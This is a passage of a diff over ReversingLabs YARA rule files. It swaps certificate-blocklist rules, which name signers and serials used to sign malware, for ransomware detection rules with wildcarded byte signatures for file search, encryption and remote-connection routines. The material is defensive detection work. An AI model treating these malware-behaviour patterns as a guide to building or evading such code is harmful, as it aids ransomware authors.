?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 + ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 + C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? + ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? + FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Infoteh63" and pe.signatures[i].serial=="3e:72:da:f2:b9:a4:44:9e:94:60:09:e5:08:4a:8e:76" and 1591787570<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($drop_ransom_note) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_11Edd343E21C36Ac985555D85C16135F : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Kangaroo : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Kangaroo ransomware." author = "ReversingLabs" - id = "219f709f-4e05-5d0e-97a4-eca1e65153a3" - date = "2023-11-08" - modified = "2023-11-08" + id = "ec4342c1-adc9-5ddb-b403-83c2b1ce5899" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4050-L4066" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "17feeed4be074a30572eb12fc81dc15d1b06f2d3f7b4b4fb4443391c62ac4d9b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Kangaroo.yara#L1-L91" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1078fb3d47ad737548419e5ee66e686f705c02fea27a58c0097446547325772c" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Kangaroo" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Pribyl Handels GmbH" and pe.signatures[i].serial=="11:ed:d3:43:e2:1c:36:ac:98:55:55:d8:5c:16:13:5f" and 1589925600<=pe.signatures[i].not_after) -} -import "pe" + strings: + $encrypt_files_p1 = { + 83 EC ?? 53 55 8B 6C 24 ?? 56 57 33 FF 57 57 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 33 DB 55 + 89 5C 24 ?? 89 7C 24 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 0F 84 ?? ?? ?? + ?? 8D 44 24 ?? 50 8D 4C 24 ?? 51 8D 54 24 ?? 52 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? 57 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? + 8B 54 24 ?? 8D 4C 24 ?? 51 57 57 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 + ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 C0 50 8B 44 24 ?? 68 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 54 24 ?? 8B 44 24 ?? 8D 4C 24 ?? + 51 6A ?? 52 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 57 56 FF + 15 ?? ?? ?? ?? 8B 54 24 ?? 57 8D 4C 24 ?? 51 57 57 6A ?? 57 52 89 44 24 ?? FF 15 ?? + ?? ?? ?? 8B 44 24 ?? 6A ?? 68 ?? ?? ?? ?? 50 57 8B 3D ?? ?? ?? ?? FF D7 8B 54 24 + } + $encrypt_files_p2 = { + 6A ?? 8D 4C 24 ?? 51 52 8B D8 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B + 44 24 ?? 8B 54 24 ?? 50 8D 4C 24 ?? 51 53 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 83 + F8 ?? 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? + 8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8D 54 24 + ?? 52 8D 44 24 ?? 50 8D 4C 24 ?? 51 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? + 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D7 68 ?? ?? ?? ?? 55 8B F8 68 ?? ?? ?? ?? 57 + FF 15 ?? ?? ?? ?? 83 C4 ?? 57 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? + ?? ?? ?? 8B C5 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15 + ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 33 FF 8B 44 24 ?? 50 FF 15 + ?? ?? ?? ?? 89 7C 24 ?? 8B 4C 24 ?? 57 51 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 5F + 5E 5D 8B C3 5B 83 C4 ?? C3 + } + $find_files = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 57 56 FF 15 ?? ?? ?? ?? 8B 3D ?? + ?? ?? ?? 33 C9 83 F8 ?? 0F 94 C1 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 89 4C 24 + ?? FF D7 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 44 24 + ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB ?? EB ?? 8D A4 24 ?? ?? ?? ?? 90 + 8B 3D ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 8D 54 24 ?? 52 56 68 ?? ?? ?? ?? 8D 84 24 ?? + ?? ?? ?? 50 EB ?? 8D 4C 24 ?? 51 56 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D7 83 + C4 ?? F6 44 24 ?? ?? 74 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 + C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 51 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D + 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 33 FF 33 F6 EB ?? 8D 9B + ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF D3 85 C0 74 ?? BF ?? ?? + ?? ?? 83 C6 ?? 83 FE ?? 72 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D3 85 C0 75 + ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 85 C0 74 ?? BF ?? ?? ?? ?? 8B 44 24 + ?? A8 ?? 75 ?? A9 ?? ?? ?? ?? 75 ?? 85 FF 75 ?? 3D ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? + 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 + C4 ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 8C + 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 75 ?? 8B 44 24 ?? 8D 54 24 ?? 52 50 FF 15 ?? + ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 51 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D + C3 + } + $enum_resources = { + 55 8B EC 83 E4 ?? 83 EC ?? 8B 4D ?? 53 56 57 8D 44 24 ?? 50 51 6A ?? 6A ?? 6A ?? C7 + 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5F 5E + 5B 8B E5 5D C2 ?? ?? 8B 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8B 4C + 24 ?? 8B C3 85 C9 74 ?? 8D 64 24 ?? C6 00 ?? 40 83 E9 ?? 75 ?? 8B 54 24 ?? 8D 44 24 + ?? 50 53 8D 4C 24 ?? 51 52 E8 ?? ?? ?? ?? 85 C0 75 ?? 33 FF 39 7C 24 ?? 76 ?? 8D 73 + ?? 8D 49 ?? 83 7E ?? ?? 75 ?? 8B 06 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4E ?? 83 E1 ?? 80 + F9 ?? 75 ?? 8D 56 ?? 52 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B 7C 24 ?? 72 ?? EB ?? 3D ?? ?? + ?? ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 50 E8 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? + 5B 8B E5 5D C2 + } -rule REVERSINGLABS_Cert_Blocklist_093Fe63D1A5F68F14Ecaac871A03F7A3 : INFO FILE + condition: + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($enum_resources) +} +rule REVERSINGLABS_Win32_Ransomware_Delphimorix : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Delphimorix ransomware." author = "ReversingLabs" - id = "ce0b23fd-5f79-5b90-8d5c-2ff59ac39df6" - date = "2023-11-08" - modified = "2023-11-08" + id = "1f964601-9819-5597-ba6e-db3a30e3aa5a" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4068-L4084" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "333c58a9af2d94604b637ab0a7280b6688a89ff73e30a93a8daed040fab7f620" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Delphimorix.yara#L1-L67" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6d401d488d57b2d75e93a1dfd47ece687a5791d1f0a52768300f4af8a8787212" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Delphimorix" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files = { + 55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 + 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A ?? 8B + 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 68 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ?? + ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B C3 + 8B 10 FF 12 52 50 B9 ?? ?? ?? ?? 8B D3 8B C6 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B + C6 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 + ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 59 59 5D C3 + } + $find_files_p1 = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? + ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B D9 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? + ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02 + ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? + ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80 FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? + ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 + } + $find_files_p2 = { + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? + ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B + C6 83 C8 ?? 3B C6 75 ?? 80 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF 75 ?? 68 ?? ?? ?? + ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? + ?? ?? ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SPECTACLE IMAGE LTD" and pe.signatures[i].serial=="09:3f:e6:3d:1a:5f:68:f1:4e:ca:ac:87:1a:03:f7:a3" and 1562716800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Bb26B7B6634D5Db548C437B5085B01C1 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Networm : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Networm ransomware." author = "ReversingLabs" - id = "443a876a-dfd7-5a9e-bb15-a44a53363494" - date = "2023-11-08" - modified = "2023-11-08" + id = "3b17b97d-c882-5f65-8b89-847e2300873c" + date = "2021-07-05" + modified = "2021-07-05" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4086-L4104" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "58d574b196f84416eb04000205cd8f4817618003f2948bb0eb7d951c282ef6ff" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Networm.yara#L1-L103" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ff9bcb9868522f9d4abf2ab9f94d5b7c9b009e5c6d0cf832c7d052f18e048b31" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Networm" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? 8B 7D ?? 33 DB + 6A ?? 59 33 C0 89 5D ?? 89 4D ?? 66 89 45 ?? 89 5D ?? 89 5D ?? 89 4D ?? 66 89 45 ?? + 68 ?? ?? ?? ?? 8B D7 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 4D ?? 3B C8 + 74 ?? 88 9D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? + 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D + 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D + ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? F6 85 + ?? ?? ?? ?? ?? 8D 45 ?? 74 ?? 6A ?? 50 8B CE E8 ?? ?? ?? ?? 8B F0 85 F6 0F 85 ?? ?? + ?? ?? 8B B5 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 FF 15 ?? ?? + ?? ?? 85 C0 74 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? + 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ?? + ?? ?? 8B 1D ?? ?? ?? ?? FF D3 8B F0 83 FE ?? 75 ?? 83 7F ?? ?? 8B C7 72 ?? 8B 07 68 + ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 7F ?? ?? 72 ?? 8B 3F 57 FF 15 ?? ?? + ?? ?? 85 C0 75 ?? FF D3 8B F0 EB ?? FF 15 ?? ?? ?? ?? EB ?? 33 F6 8D 4D ?? E8 ?? ?? + ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? C2 + } + $remote_connection_p1 = { + 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56 57 6A ?? 8B FA 8B F1 + FF 15 ?? ?? ?? ?? 33 C0 50 50 89 45 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 57 56 + FF 15 ?? ?? ?? ?? 8B D3 8B C8 E8 ?? ?? ?? ?? 83 3B ?? 8B F0 75 ?? 68 ?? ?? ?? ?? EB + ?? 81 3B ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? EB ?? 81 3B ?? ?? ?? + ?? 74 ?? 81 3B ?? ?? ?? ?? 74 ?? 85 F6 74 ?? 83 C8 ?? EB ?? 83 65 ?? ?? 8D 75 ?? 8B + 45 ?? 8B FB C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? A5 A5 A5 8B 4D ?? 5F 5E 33 CD 5B E8 ?? + ?? ?? ?? C9 C3 + } + $remote_connection_p2 = { + 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56 57 6A ?? 8B FA 8B F1 + FF 15 ?? ?? ?? ?? 33 C0 50 50 50 89 45 ?? 8D 45 ?? 50 FF 75 ?? 57 56 FF 15 ?? ?? ?? + ?? 8B D3 8B C8 E8 ?? ?? ?? ?? 83 3B ?? 8B F0 75 ?? 68 ?? ?? ?? ?? EB ?? 81 3B ?? ?? + ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 85 F6 74 ?? 83 C8 ?? EB ?? 83 65 ?? + ?? 8D 75 ?? 8B 45 ?? 8B FB C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? A5 A5 A5 8B 4D ?? 5F 5E + 33 CD 5B E8 ?? ?? ?? ?? C9 C3 + } + $encrypt_files_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ?? + 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 8B 45 ?? 83 F8 ?? C7 45 ?? ?? ?? ?? ?? 0F + 94 C7 83 F8 ?? 0F 94 C3 83 F8 ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 0F B6 C3 83 F0 ?? 8D 04 + 45 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 6A ?? FF 76 ?? FF 15 ?? ?? ?? ?? 8B C8 89 4E ?? + 85 C9 0F 84 ?? ?? ?? ?? 84 FF 74 ?? BF ?? ?? ?? ?? EB ?? 0F B6 C3 8D 3C 45 ?? ?? ?? + ?? 8B 56 ?? 8B 46 ?? 85 D2 7C ?? 0F 8F ?? ?? ?? ?? 85 C0 72 ?? 85 D2 7C ?? 0F 8F ?? + ?? ?? ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 55 ?? EB ?? 0F 57 C0 66 0F 13 + 45 ?? 8B 45 ?? FF 75 ?? 50 FF 75 ?? FF 75 ?? 57 51 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D + 4D ?? 89 46 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? + 59 5F 5E 5B 8B E5 5D C2 + } + $encrypt_files_p2 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 56 A1 ?? ?? ?? ?? 33 C5 + 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 83 7E ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? + ?? 8B 4D ?? 85 C9 74 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 45 ?? 85 C0 74 ?? 0F + 8E ?? ?? ?? ?? 83 F8 ?? 7E ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? EB ?? F6 C1 ?? C7 45 ?? ?? + ?? ?? ?? B8 ?? ?? ?? ?? 0F 95 C0 40 89 45 ?? 83 7D ?? ?? 7F ?? 0F 8C ?? ?? ?? ?? 83 + 7D ?? ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 7F ?? 0F 8C ?? ?? ?? ?? 83 7D ?? ?? 0F 82 ?? + ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 8D 45 ?? 8B + CE 50 E8 ?? ?? ?? ?? 8D 45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D + ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B E5 5D C2 ?? ?? 8D 45 ?? 6A + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ?? + ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 + ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 + 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO \"IT Mott\"" and (pe.signatures[i].serial=="00:bb:26:b7:b6:63:4d:5d:b5:48:c4:37:b5:08:5b:01:c1" or pe.signatures[i].serial=="bb:26:b7:b6:63:4d:5d:b5:48:c4:37:b5:08:5b:01:c1") and 1591919307<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_29128A56E7B3Bfb230742591Ac8B4718 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_MZP : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects MZP ransomware." author = "ReversingLabs" - id = "b868d2f2-3852-57a3-be01-32cc16eb2ff7" - date = "2023-11-08" - modified = "2023-11-08" + id = "c08a4080-fa26-5b7b-869d-5f59096b1a12" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4106-L4122" - license_url = 